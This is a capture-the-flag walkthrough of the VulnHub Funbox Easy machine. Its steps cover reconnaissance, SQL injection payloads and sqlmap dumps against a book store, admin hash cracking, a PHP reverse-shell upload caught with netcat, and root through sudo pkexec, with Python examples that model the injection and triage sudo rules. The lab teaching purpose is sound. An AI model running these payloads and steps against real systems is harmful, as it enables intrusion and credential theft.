Machine Link : https://www.vulnhub.com/entry/funbox-easy,526/
STEP1
arp-scan -l
FINDING
192.168.0.105
-------------------------------------------------------------------------------------------------
STEP2
nmap -sSV -A -Pn -p- 192.168.0.105
FINDING
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open mysqlx MySQL X protocol listener
-------------------------------------------------------------------------------------------------
STEP3
dirb http://192.168.0.105
FINDING
+ http://192.168.0.105/robots.txt (CODE:200|SIZE:14)
== DIRECTORY: http://192.168.0.105/secret/
+ http://192.168.0.105/server-status (CODE:403|SIZE:278)
== DIRECTORY: http://192.168.0.105/store/
---- Entering directory: http://192.168.0.105/admin/ ----
== DIRECTORY: http://192.168.0.105/admin/assets/
---- Entering directory: http://192.168.0.105/store/ ----
+ http://192.168.0.105/store/admin.php (CODE:200|SIZE:3153)
== DIRECTORY: http://192.168.0.105/store/controllers/
== DIRECTORY: http://192.168.0.105/store/database/
== DIRECTORY: http://192.168.0.105/store/functions/
+ http://192.168.0.105/store/index.php (CODE:200|SIZE:3998)
== DIRECTORY: http://192.168.0.105/store/models/
== DIRECTORY: http://192.168.0.105/store/template/
Browsing the hits:
http://192.168.0.105/store/          - the online book store (book.php, admin.php live here)
http://192.168.0.105/store/admin.php - store admin login
http://192.168.0.105/secret/         - only shows the quote: „Anyone who lives within their means suffers from a lack of imagination.“ Oscar Wilde (*1854 - †1900)
http://192.168.0.105/admin/          - second admin login, not needed for the rest of this walkthrough
-------------------------------------------------------------------------------------------------
STEP4
nikto --host http://192.168.0.105
FINDING
+ /admin/: This might be interesting.
+ /secret/: This might be interesting.
+ /store/: This might be interesting.
+ /admin/index.php: This might be interesting: has been seen in web logs from an unknown scanner.
+ 8103 requests: 0 error(s) and 12 item(s) reported on remote host
-------------------------------------------------------------------------------------------------
STEP5
dirsearch -u http://192.168.0.105
FINDING
http://192.168.0.105/index.php
http://192.168.0.105/index.php/login/registration.php
-------------------------------------------------------------------------------------------------
STEP6
The store looks up a book by the ISBN passed in the query string:
http://192.168.31.119/store/book.php?bookisbn=978-1-49192-706-9
(from here on the target answers on 192.168.31.119, presumably the VM was redeployed on another network; use whatever IP your own instance got)
CHANGE IT TO
http://192.168.31.119/store/book.php?bookisbn=1%27+or+1=1--
FINDING
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1
The single quote reached MySQL unescaped, so bookisbn is injectable. (MySQL only treats -- as a comment when whitespace follows it, so terminate payloads with "-- -" or %23 to avoid exactly this syntax error and get a clean true/false response.)
-------------------------------------------------------------------------------------------------
STEP7
sqlmap -u "http://192.168.31.119/store/book.php?bookisbn=" --batch -D store --dump
(-u is required in front of the URL; --dump-all walks every database, with -D store you want plain --dump)
FINDING
+--------------------------------------------------+--------+
| pass                                             | name   |
+--------------------------------------------------+--------+
| d033e22ae348aeb5660fc2140aec35850c4da997 (admin) | admin  |
+--------------------------------------------------+--------+
The value in brackets is sqlmap's own crack: the column holds unsalted SHA-1 and sha1("admin") = d033e22ae348aeb5660fc2140aec35850c4da997, so the admin password is admin.
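An added example, not code from the walkthrough or from the book-store app: an offline model of what steps 6 and 7 exploit, run against an in-memory SQLite copy of the store. The table and column names (books.book_isbn, admin.name / admin.pass) and the seed rows are assumptions; only the admin hash is the one sqlmap dumped. SQLite accepts "--" without a trailing space, so the exact MySQL syntax error above does not reproduce here; the "-- -" terminator works on both engines.

```python
# Added example (not from the walkthrough): the book.php injection modelled on SQLite.
# Schema and sample books are constructed; the admin hash is the one from the sqlmap dump.
import hashlib
import sqlite3

ADMIN_HASH = "d033e22ae348aeb5660fc2140aec35850c4da997"


def build_db():
    """In-memory stand-in for the MySQL 'store' database (assumed schema)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE books (book_isbn TEXT, book_title TEXT);
        CREATE TABLE admin (name TEXT, pass TEXT);
        INSERT INTO books VALUES ('978-1-49192-706-9', 'Constructed title one');
        INSERT INTO books VALUES ('978-0-00-000000-0', 'Constructed title two');
    """)
    con.execute("INSERT INTO admin VALUES (?, ?)", ("admin", ADMIN_HASH))
    con.commit()
    return con


def lookup_vulnerable(con, isbn):
    """What book.php effectively does: the ISBN is pasted straight into the SQL string."""
    sql = f"SELECT book_isbn, book_title FROM books WHERE book_isbn = '{isbn}'"
    return con.execute(sql).fetchall()


def lookup_fixed(con, isbn):
    """Parameterised version: the ISBN is data and can never change the query structure."""
    return con.execute(
        "SELECT book_isbn, book_title FROM books WHERE book_isbn = ?", (isbn,)
    ).fetchall()


def crack_sha1(digest, candidates):
    """What sqlmap did to print '(admin)' next to the hash: unsalted SHA-1 vs a wordlist."""
    for word in candidates:
        if hashlib.sha1(word.encode()).hexdigest() == digest:
            return word
    return None


if __name__ == "__main__":
    con = build_db()
    # WHERE clause is always true: every book comes back
    print(lookup_vulnerable(con, "1' OR 1=1-- -"))
    # UNION pulls the admin row out through the two book columns
    print(lookup_vulnerable(con, "x' UNION SELECT name, pass FROM admin-- -"))
    # same payload against the fixed query is just a non-existent ISBN
    print(lookup_fixed(con, "1' OR 1=1-- -"))
    print(crack_sha1(ADMIN_HASH, ["password", "123456", "admin"]))
```

The UNION payload is the manual equivalent of the sqlmap dump: once you know the column count of the original SELECT, any table the web user can read comes out through the page.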
-------------------------------------------------------------------------------------------------
STEP8
http://192.168.0.105/store/admin.php
log in with admin / admin (the credentials cracked in step 7)
FINDING
the login lands on the book-management page http://192.168.31.119/store/admin_book.php
-------------------------------------------------------------------------------------------------
STEP9
in admin_book.php add a new record (book); the form takes a cover-image upload and accepts a .php file as the image
upload a PHP reverse shell as the "image", with LHOST set to your attacker IP and LPORT to the port you will listen on
-------------------------------------------------------------------------------------------------
STEP10
nc -nvlp 4444 on a new terminal (the -p argument is a port, not the target IP; 4444 is an example and must match LPORT in the payload)
hit -- http://192.168.31.119/store/
the store front page loads the uploaded "cover image", so Apache executes the PHP and the listener gets a reverse shell
-------------------------------------------------------------------------------------------------
STEP11
cd /home
cd tony
ls -la
cat password.txt
FINDING
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: [email protected] admin
-------------------------------------------------------------------------------------------------
STEP12
on a new terminal
ssh tony@192.168.31.119     (user tony from /home/tony; substitute your target IP)
password: yxcvbnmYYY
sudo -l
FINDING
(root) NOPASSWD: /usr/bin/yelp
(root) NOPASSWD: /usr/bin/dmf
(root) NOPASSWD: /usr/bin/whois
(root) NOPASSWD: /usr/bin/rlogin
(root) NOPASSWD: /usr/bin/pkexec
(root) NOPASSWD: /usr/bin/mtr
(root) NOPASSWD: /usr/bin/finger
(root) NOPASSWD: /usr/bin/time
(root) NOPASSWD: /usr/bin/cancel
(root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
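An added example, not code from the walkthrough: parse the `sudo -l` output from step 12 and sort the entries into "known root shell", "custom script, read it first" and "check GTFOBins yourself". The rule lines are copied from the finding above; the "Matching Defaults" header is what sudo normally prints and is assumed here. The lookup table only contains the two binaries I know have a GTFOBins sudo entry that drops straight to a shell (pkexec and time); extend it from gtfobins.github.io before relying on it on other boxes.

```python
# Added example (not from the walkthrough): triage of `sudo -l` output.
# SUDO_L_OUTPUT is constructed from the finding above plus the usual sudo header.
import re

SUDO_L_OUTPUT = """\
Matching Defaults entries for tony on funbox:
    env_reset, mail_badpass

User tony may run the following commands on funbox:
    (root) NOPASSWD: /usr/bin/yelp
    (root) NOPASSWD: /usr/bin/dmf
    (root) NOPASSWD: /usr/bin/whois
    (root) NOPASSWD: /usr/bin/rlogin
    (root) NOPASSWD: /usr/bin/pkexec
    (root) NOPASSWD: /usr/bin/mtr
    (root) NOPASSWD: /usr/bin/finger
    (root) NOPASSWD: /usr/bin/time
    (root) NOPASSWD: /usr/bin/cancel
    (root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
"""

# Binaries with a GTFOBins "Sudo" entry that gives a shell directly (hand-picked subset).
SHELL_VIA_SUDO = {
    "pkexec": "sudo pkexec /bin/sh",
    "time": "sudo /usr/bin/time /bin/sh",
}

SYSTEM_DIRS = ("/usr/bin/", "/bin/", "/usr/sbin/", "/sbin/")

# one rule line: "(runas) [NOPASSWD:] command [args]"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<nopasswd>NOPASSWD:\s+)?(?P<cmd>\S.*)$")


def parse_sudo_l(output):
    """Return [(runas, nopasswd, command)] for every rule line in `sudo -l` output."""
    entries = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m.group("runas"), m.group("nopasswd") is not None, m.group("cmd").strip()))
    return entries


def triage(output):
    """Map each allowed command to a short verdict on what to try with it."""
    verdicts = {}
    for runas, nopasswd, cmd in parse_sudo_l(output):
        binary = cmd.split()[0]
        name = binary.rsplit("/", 1)[-1]
        if name in SHELL_VIA_SUDO:
            verdicts[cmd] = f"root shell: {SHELL_VIA_SUDO[name]}"
        elif not binary.startswith(SYSTEM_DIRS):
            verdicts[cmd] = "custom script outside the system dirs; read it and check who can write it before running"
        else:
            verdicts[cmd] = "no known shell escape in this table; check GTFOBins for file read/write primitives"
    return verdicts


if __name__ == "__main__":
    for cmd, verdict in triage(SUDO_L_OUTPUT).items():
        print(f"{cmd}\n    {verdict}")
```

Both flagged one-liners work here because the rules are NOPASSWD and run as root; the script reports that explicitly so a rule that runs as a non-root user is not mistaken for a root shell.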
-------------------------------------------------------------------------------------------------
STEP13
https://gtfobins.github.io/gtfobins/pkexec/#sudo
(/usr/bin/time from the same list works too: sudo /usr/bin/time /bin/sh)
FINDING
sudo pkexec /bin/sh
whoami
root
cd /root
ls -la
cat root.flag
__________ ___. ___________
\_ _____/_ __ ____\_ |__ _______ ___ /\ \_ _____/____ _________.__.
| __)| | \/ \| __ \ / _ \ \/ / \/ | __)_\__ \ / ___ | |
| \ | | / | \ \_\ ( _ /\ | \/ __ \_\___ \ \___ |
\___ / |____/|___| /___ /\____/__/\_ \ \/ /_______ (____ /____ / ____|
\/ \/ \/ \/ \/ \/ \/ \/
-------------------------------------------------------------------------------------------------